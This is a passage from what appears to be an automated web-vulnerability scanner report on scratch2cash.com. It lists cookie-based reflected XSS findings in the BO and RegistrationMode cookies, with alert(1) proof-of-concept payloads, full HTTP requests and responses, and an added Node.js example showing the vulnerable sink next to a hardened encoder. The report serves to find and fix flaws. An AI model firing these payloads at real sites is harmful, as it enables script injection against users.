User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMe7ad9"-alert(1)-"92dfafb48c7; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe7ad9"-alert(1)-"92dfafb48c7; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54985


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe7ad9"-alert(1)-"92dfafb48c7";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.390. http://www.scratch2cash.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 722d7"-alert(1)-"9aa23431ce7 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM722d7"-alert(1)-"9aa23431ce7; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FM722d7"-alert(1)-"9aa23431ce7; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM722d7"-alert(1)-"9aa23431ce7";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.391. http://www.scratch2cash.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7879"-alert(1)-"a0288f5380d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMe7879"-alert(1)-"a0288f5380d; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe7879"-alert(1)-"a0288f5380d; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe7879"-alert(1)-"a0288f5380d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.392. http://www.scratch2cash.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d82"-alert(1)-"2df883164f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMe8d82"-alert(1)-"2df883164f; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: BO=FMe8d82"-alert(1)-"2df883164f; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe8d82"-alert(1)-"2df883164f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.393. http://www.scratch2cash.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64604"-alert(1)-"493b1a09e1a was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM64604"-alert(1)-"493b1a09e1a; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM64604"-alert(1)-"493b1a09e1a; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM64604"-alert(1)-"493b1a09e1a";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.394. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbbfd"-alert(1)-"4d0f4733887 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMbbbfd"-alert(1)-"4d0f4733887; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FMbbbfd"-alert(1)-"4d0f4733887; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbbbfd"-alert(1)-"4d0f4733887";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.395. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2b70"-alert(1)-"ddf84599304 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that the response below re-issues the tainted value unchanged (Set-Cookie: RegistrationMode=PMf2b70"-alert(1)-"ddf84599304; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/), so a value that is planted once is replayed into every page that copies this cookie into script until the cookie expires or is overwritten, and the domain attribute scopes it to every host under scratch2cash.com.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMf2b70"-alert(1)-"ddf84599304; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf2b70"-alert(1)-"ddf84599304; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf2b70"-alert(1)-"ddf84599304";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...
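The findings in this report all share one sink: a cookie value concatenated into a double-quoted JavaScript string literal in the page's initialization block. The following is an added example, not code from the report or from the scratch2cash.com application: it rebuilds that block in Node.js so the break-out can be exercised without a browser, places a hardened rendering beside it, and adds the allow-list check the remediation text points at. Function names (renderInitScriptVulnerable, jsStringLiteral, runWithStubbedAlert, normalizeModeCode) and the assumption that valid mode codes are two upper-case letters are this example's own.

```javascript
// Added example, not part of the original report: the report's script block
// rebuilt in Node.js so the break-out can be exercised without a browser,
// beside a hardened rendering. Function names are this example's own.

// 1. Vulnerable rendering: the cookie value is concatenated straight into a
//    double-quoted string literal, exactly as the response excerpt shows.
function renderInitScriptVulnerable(registrationMode, bonusOption) {
  return (
    'var strRegistrationMode = "' + registrationMode + '";\n' +
    'var strBonusOption = "' + bonusOption + '";\n' +
    'return { mode: strRegistrationMode, bonus: strBonusOption };'
  );
}

// 2. Hardened rendering: the value is emitted as a JavaScript string literal.
//    JSON.stringify escapes quotes, backslashes and control characters; the
//    extra replacements cover what still breaks an inline <script> block:
//    "</script>" and "-->" (via < and >) and the U+2028/U+2029 line
//    terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderInitScriptHardened(registrationMode, bonusOption) {
  return (
    'var strRegistrationMode = ' + jsStringLiteral(registrationMode) + ';\n' +
    'var strBonusOption = ' + jsStringLiteral(bonusOption) + ';\n' +
    'return { mode: strRegistrationMode, bonus: strBonusOption };'
  );
}

// 3. Allow-list validation, which is what the remediation text asks for:
//    keep cookie data out of the script context entirely by accepting only a
//    known code. The observed values are two-letter codes ("PM", "FM"); that
//    this is the whole format is an assumption of this example.
function normalizeModeCode(value, fallback) {
  return /^[A-Z]{2}$/.test(value) ? value : fallback;
}

// Run a rendered script with alert() replaced by a recorder, so the payload's
// effect is observable as data: which alert() calls fired, and what the two
// variables ended up holding.
function runWithStubbedAlert(script) {
  const alertCalls = [];
  let result = null;
  let error = null;
  try {
    // "alert" is the function's parameter, so the injected alert(1) hits
    // the recorder instead of a browser dialog.
    result = new Function('alert', script)((x) => { alertCalls.push(x); return 0; });
  } catch (e) {
    error = e;
  }
  return { alertCalls, result, error };
}

// The payload from finding 3.396, cookie prefix included.
const REPORT_PAYLOAD = 'FM32f61"-alert(1)-"5c80bc1846f';

// Running both renderings against the report's payload: the vulnerable one
// records alert(1) and leaves strBonusOption as NaN (the string arithmetic
// "FM32f61" - alert(1) - "5c80bc1846f"); the hardened one records nothing
// and strBonusOption holds the payload as inert text.
const VULNERABLE_RUN = runWithStubbedAlert(renderInitScriptVulnerable('PM', REPORT_PAYLOAD));
const HARDENED_RUN = runWithStubbedAlert(renderInitScriptHardened('PM', REPORT_PAYLOAD));
```

On the ASP.NET side seen in the X-AspNet-Version header (2.0.50727) there is no built-in JavaScript string encoder; HttpUtility.JavaScriptStringEncode only arrived with .NET 4, and on 2.0 the Microsoft AntiXSS library's JavaScriptEncode or an equivalent routine has to be used. Encoding alone still leaves the cookie value flowing into script, which is why the allow-list step is the better fix for a two-letter mode code.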

3.396. http://www.scratch2cash.com/Sitemap.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Sitemap.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32f61"-alert(1)-"5c80bc1846f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM32f61"-alert(1)-"5c80bc1846f; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: BO=FM32f61"-alert(1)-"5c80bc1846f; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM32f61"-alert(1)-"5c80bc1846f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.397. http://www.scratch2cash.com/Sitemap.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Sitemap.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c088a"-alert(1)-"70c96cb89d5 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMc088a"-alert(1)-"70c96cb89d5; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc088a"-alert(1)-"70c96cb89d5; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
